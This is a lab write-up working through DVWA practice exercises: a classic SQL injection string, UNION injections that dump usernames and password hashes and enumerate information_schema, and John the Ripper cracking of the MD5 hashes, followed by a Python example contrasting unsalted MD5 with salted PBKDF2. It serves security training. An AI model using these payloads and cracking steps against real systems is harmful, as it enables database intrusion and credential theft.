# DVWA Exercises 5

### 09 SQL Injection

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FaGFNnBZoQ1QE9cEne6Qn%2Fsqli01.png?alt=media&#x26;token=2a743f37-6cee-4121-b0c1-1b08e0ea2577" alt=""></div>

Here we can see an input field where we can put in a number. The SQL statement in the background could look like this:

`select firstname,surname from users where uid='$_GET['id']';`

Let's try to inject a SQL statement:

`1' or '1' = '1`

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FtQlFNPP5jha4aaISNsBR%2Fsqli02.png?alt=media&#x26;token=11e75f87-bcce-4d09-bdc9-1db8c83ed3f7" alt=""></div>

### 10 SQL Injection with union

With a SQL `UNION` we can grab information from other tables.

The `UNION` keyword lets you execute one or more additional `SELECT` queries and append the results to the original query. For example:

```
SELECT a, b FROM table1 UNION SELECT c, d FROM table2
```

This SQL query will return a single result set with two columns, containing values from columns `a` and `b` in `table1` and columns `c` and `d` in `table2`.

For a `UNION` query to work, two key requirements must be met:

* The individual queries must return the same number of columns.
* The data types in each column must be compatible between the individual queries.

Let's try the following SQL Query:

```
%' or '0'='0' union select user,password from users #
```

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FDQJOusCEvYZtncqp3ggB%2Fsqli03.png?alt=media&#x26;token=d72958b8-3cce-441f-baab-afd823e5c3d1" alt=""></div>

### 11 Further Database Enumeration

Most database types (with the notable exception of Oracle) have a set of views called the information schema, which provides information about the database.

You can query `information_schema.tables` to list the tables in the database:

```
SELECT * FROM information_schema.tables
```

You can then query `information_schema.columns` to list the columns in individual tables:

```
SELECT * FROM information_schema.columns WHERE table_name = 'Users'
```

Let's try the following SQL Query:

```
%' or '0'='0' union select TABLE_NAME,COLUMN_NAME from information_schema.COLUMNS #
```

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2Fbfctl39jtd5oQfzNUn1p%2Fsqli04.png?alt=media&#x26;token=da9dc5d7-7a54-4141-9408-cc0afa1113d5" alt=""></div>

### 12 Crack the password hashes

I put the collected password hashes in a file and try to crack the passwords with John the Ripper.

First let's check which hash type we have with a tool called `hash-identifier`:

![](https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2F38raPTBo7ndrEvAJB3D3%2Fjtr01.png?alt=media\&token=9b574745-e9ee-4f2e-b3d9-1d590e6809b8)

```
john --wordlist=/usr/share/wordlists/rockyou.txt --format=RAW-MD5 hashes.txt
```

![](https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2F89o8dBiCEpCxB1U0qEpF%2Fjtr02.png?alt=media\&token=847cde24-6f92-491a-a15a-9f07a99e9245)
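The wordlist run above succeeds because DVWA stores unsalted MD5: every account with the same password has the same hash, and each guess costs one fast hash computation. As an added example (not from the exercise or from DVWA), the following shows that property next to a salted, iterated PBKDF2 record, using a constructed sample password; the record format `iterations$salt$digest` is this example's own choice.

```python
import hashlib
import hmac
import os
from typing import Optional

# Constructed sample password for the demonstration (not a DVWA credential).
SAMPLE_PASSWORD = "correct horse battery staple"


def md5_record(password: str) -> str:
    """Unsalted MD5, the scheme behind the RAW-MD5 hashes cracked above.
    Deterministic: equal passwords give equal hashes across all accounts."""
    return hashlib.md5(password.encode()).hexdigest()


def pbkdf2_record(password: str, iterations: int = 200_000,
                  salt: Optional[bytes] = None) -> str:
    """Salted, iterated hash stored as 'iterations$salt_hex$digest_hex'.
    A fresh random salt per account makes equal passwords look different and
    forces a cracker to redo the whole iteration count for every account."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"{iterations}${salt.hex()}${digest.hex()}"


def pbkdf2_verify(record: str, password: str) -> bool:
    """Recompute the digest with the stored salt and iteration count and compare
    in constant time."""
    iterations, salt_hex, digest_hex = record.split("$")
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


def shared_password_visible(scheme, password: str) -> bool:
    """True if two accounts with the same password get identical stored values,
    which is what lets one wordlist hit unlock several accounts at once."""
    return scheme(password) == scheme(password)


if __name__ == "__main__":
    print("MD5 of 'password':", md5_record("password"))
    print("two MD5 records equal:", shared_password_visible(md5_record, SAMPLE_PASSWORD))
    print("two PBKDF2 records equal:", shared_password_visible(pbkdf2_record, SAMPLE_PASSWORD))
    rec = pbkdf2_record(SAMPLE_PASSWORD)
    print("PBKDF2 verify:", pbkdf2_verify(rec, SAMPLE_PASSWORD), pbkdf2_verify(rec, "wrong"))
```

The MD5 of `password` is the well-known `5f4dcc3b5aa765d61d8327deb882cf99`, which is why a wordlist pass identifies it immediately; the two PBKDF2 records for the same password differ and each verifies only with its own salt.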

